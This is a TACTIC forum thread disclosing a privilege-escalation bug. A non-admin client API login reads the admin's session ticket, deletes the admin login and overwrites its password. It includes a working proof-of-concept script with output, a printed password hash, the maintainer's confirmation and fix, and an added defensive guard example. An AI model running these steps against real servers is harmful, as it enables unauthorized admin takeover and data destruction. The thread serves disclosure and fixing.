TACTIC Open Source
client api: accessing sthpw search types using non admin user

Forum: TACTIC Open Source (http://forum.southpawtech.com)
Forum: TACTIC Open Source (http://forum.southpawtech.com/forumdisplay.php?fid=3)
Forum: TACTIC Discussion (http://forum.southpawtech.com/forumdisplay.php?fid=4)
Thread: client api: accessing sthpw search types using non admin user (/showthread.php?tid=249)



client api: accessing sthpw search types using non admin user - LazyLeopard - 11-17-2021

I am playing with the python client api at the moment. I have been able to get this sequence going.

Code:
import tactic_client_lib as tcl

server = tcl.TacticServerStub.get()  # login using non-admin user
server.check_access('project', {'code': 'new_project'}, 'allow')
# False

# the non-admin login can read the admin login's tickets from sthpw/ticket
ticket = server.query('sthpw/ticket', filters=[('login', 'admin')], order_bys=['timestamp desc'], single=True)
server.set_ticket(ticket['ticket'])

server.check_access('project', {'code': 'new_project'}, 'allow')
# True


I am also able to query other `sthpw` search types including `sthpw/file` and `sthpw/snapshot`. All of which pound the db very heavily.

Actually, I also don't need any special permissions to go ahead and delete the admin user

Code:
server.delete_sobject('sthpw/login?code=admin')


{'__search_key__': 'sthpw/login?code=admin',
'__search_type__': 'sthpw/login',
'code': 'admin',
'data': None,
'department': None,
'display_name': ', Admin',
'email': None,
'first_name': 'Admin',
'hourly_wage': None,
'id': 1,
'keywords': None,
'keywords_data': None,
'last_name': None,
'license_type': None,
'location': None,
'login': 'admin',
'login_attempt': None,
'login_groups': None,
'namespace': None,
'password': '$S$DCUJSVJNAiQgZrkG8WAGF0U7WkXge5RACaiIPXlQKd0rPZAc8bCg',
'phone_number': None,
'project_code': None,
's_status': None,
'snapshot': None,
'upn': 'admin'}

or directly update its password without any problem!

Code:
user = server.get_by_search_key('sthpw/login?code=user')
server.update('sthpw/login?code=admin', {'password': user['password']})


Is this intended behaviour?

What can I do to disable this?


RE: client api: accessing sthpw search types using non admin user - listy - 11-18-2021

1. Where are you running this code? From the script editor as admin?
2. Print current login and ticket using api to make sure


RE: client api: accessing sthpw search types using non admin user - LazyLeopard - 11-18-2021

(11-18-2021, 10:10 AM)listy Wrote: 1. Where are you running this code? From the script editor as admin?
2. Print current login and ticket using api to make sure
I am running this code from a python repl from my host against the docker 4.8.0 image.

I log in using the get_ticket + set_ticket sequence.


RE: client api: accessing sthpw search types using non admin user - LazyLeopard - 11-19-2021

(11-18-2021, 04:58 PM)LazyLeopard Wrote:
(11-18-2021, 10:10 AM)listy Wrote: 1. Where are you running this code? From the script editor as admin?
2. Print current login and ticket using api to make sure
I am running this code from a python repl from my host against the docker 4.8.0 image.

I log in using the get_ticket + set_ticket sequence.


For your convenience:

test_tactic.py

Code:
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from __future__ import print_function

import tactic_client_lib as tcl

# connect as the non-admin login "tactic" and obtain its own ticket
stub = tcl.TacticServerStub.get(setup=False)
stub.set_server('localhost')
ticket = stub.get_ticket('tactic', 'tactic123')
stub.set_ticket(ticket)
print('\nAcquired tactic ticket', ticket)

project_codes = stub.eval("@GET(sthpw/project.code)")
print('Project codes:', project_codes)


print('\nAccess status for tactic:')
print('===========================')
for pc in project_codes:
    access = stub.check_access('project', {'code': pc}, 'allow')
    print('project {pc} is {noaccess}accessible'.format(
        pc=pc, noaccess='' if access else 'NOT '))


# while still authenticated as "tactic", read the newest ticket issued to admin
ticket = stub.query(
    'sthpw/ticket', filters=[('login', 'admin')], order_bys=['timestamp desc'],
    single=True)

print('\nAcquired ticket {ticket} for {login}!'.format(**ticket))
stub.set_ticket(ticket['ticket'])

print('\nAccess status for {login}:'.format(**ticket))
print('===========================')
for pc in project_codes:
    access = stub.check_access('project', {'code': pc}, 'allow')
    print('project {pc} is {noaccess}accessible'.format(
        pc=pc, noaccess='' if access else 'NOT '))


Windows CMD

Code:
(venv) D:\talha.ahmed\Workspace>python test_tactic.py

Acquired tactic ticket cbb9ad3e6aeca620192
Project codes: ['admin', 'episodic', 'important_project', 'new_project', 'sthpw']

Access status for tactic:
===========================
project admin is NOT accessible
project episodic is NOT accessible
project important_project is NOT accessible
project new_project is NOT accessible
project sthpw is NOT accessible

Acquired ticket 5cdf6ef2992669e88b2 for admin!

Access status for admin:
===========================
project admin is accessible
project episodic is accessible
project important_project is accessible
project new_project is accessible
project sthpw is accessible



RE: client api: accessing sthpw search types using non admin user - Diego - 11-22-2021

Hi LazyLeopard,
this is a bad security bug!

I tracked it to src/pyasm/search/search.py.
When api_mode is open (the default), there is no check for access to some security-critical tables.

Could you open an Issue on github reporting the bug? I will make a PR to fix it...
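As an added illustration of the missing check Diego describes (this is not TACTIC's code and not his PR; it is a stand-alone Python model written for this thread), the guard below denies any non-admin login the query, insert, update and delete operations on a small set of security-critical search types, independent of api_mode. The list of protected types, the Login class, the closed-mode behaviour and the search-type names used in the replay are assumptions for the demo; the replay_thread function walks the three operations from the first post and shows each one refused for the non-admin login.

```python
# Added example, not TACTIC's own code: a toy model of the server-side
# access guard the thread says is missing when api_mode is "open".

# Assumed list of security-critical search types. sthpw/login and
# sthpw/ticket appear in the thread; sthpw/login_group is an assumption.
SECURITY_CRITICAL_SEARCH_TYPES = frozenset({
    "sthpw/login",        # user rows, including password hashes
    "sthpw/ticket",       # session tickets; reading one is full impersonation
    "sthpw/login_group",  # assumed: group membership drives access rules
})

OPERATIONS = ("query", "insert", "update", "delete")


class AccessDenied(PermissionError):
    """Raised when a login may not perform an operation on a search type."""


class Login:
    """Minimal stand-in for a server-side login (assumed shape)."""

    def __init__(self, code, groups=()):
        self.code = code
        self.groups = frozenset(groups)

    def is_admin(self):
        return "admin" in self.groups


def base_search_type(search_key_or_type):
    """'sthpw/login?code=admin' -> 'sthpw/login'; plain types pass through."""
    return search_key_or_type.split("?", 1)[0]


def check_search_type_access(search_key_or_type, login, operation="query",
                             api_mode="open"):
    """Return True if the operation may proceed, otherwise raise AccessDenied.

    The bug in the thread: in open mode every search type was reachable.
    This guard applies the critical-type deny rule before consulting api_mode,
    so open mode can no longer expose tickets or login rows to non-admins.
    """
    if operation not in OPERATIONS:
        raise ValueError("unknown operation %r" % (operation,))
    stype = base_search_type(search_key_or_type)
    if stype in SECURITY_CRITICAL_SEARCH_TYPES and not login.is_admin():
        raise AccessDenied("%s may not %s %s" % (login.code, operation, stype))
    if api_mode == "open" or login.is_admin():
        return True  # non-critical types stay open, as before
    # Assumed closed-mode behaviour for the demo: non-admins are refused
    # unless an explicit rule allows them, and this model has no such rules.
    raise AccessDenied("%s may not %s %s in closed mode"
                       % (login.code, operation, stype))


def is_allowed(search_key_or_type, login, operation="query", api_mode="open"):
    """Boolean convenience wrapper around check_search_type_access."""
    try:
        return check_search_type_access(search_key_or_type, login,
                                        operation, api_mode)
    except AccessDenied:
        return False


def replay_thread(login, api_mode="open"):
    """Re-run the operations from the first post through the guard.

    Returns a dict of step name -> allowed, so the result can be inspected
    or asserted on. 'new_project/asset' is an assumed non-critical type.
    """
    steps = {
        "read admin ticket": ("sthpw/ticket", "query"),
        "delete admin login": ("sthpw/login?code=admin", "delete"),
        "overwrite admin password": ("sthpw/login?code=admin", "update"),
        "query project asset": ("new_project/asset", "query"),
    }
    return {name: is_allowed(stype, login, op, api_mode)
            for name, (stype, op) in steps.items()}


if __name__ == "__main__":
    non_admin = Login("tactic", groups=("user",))   # constructed sample login
    admin = Login("admin", groups=("admin",))       # constructed sample login
    for who in (non_admin, admin):
        print(who.code, replay_thread(who))
```

Run stand-alone it prints one line per login; the non-admin line shows the ticket read, the login delete and the password update all refused while the ordinary project query still succeeds, and the admin line shows everything allowed. After applying the real fix, the same expectation can be checked against a live server with the test_tactic.py script from earlier in the thread: the sthpw/ticket query for admin should now fail for the tactic login instead of returning a ticket.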


RE: client api: accessing sthpw search types using non admin user - LazyLeopard - 11-23-2021

Bug Report Posted:

https://github.com/Southpaw-TACTIC/TACTIC/issues/1694


RE: client api: accessing sthpw search types using non admin user - Diego - 11-23-2021

Thanks LazyLeopard!
I submitted a PR to fix the bug. I will update the docker images whenever Remko merges it.

If you want to test it, it's an easy edit on src/pyasm/search/search.py

Cheers.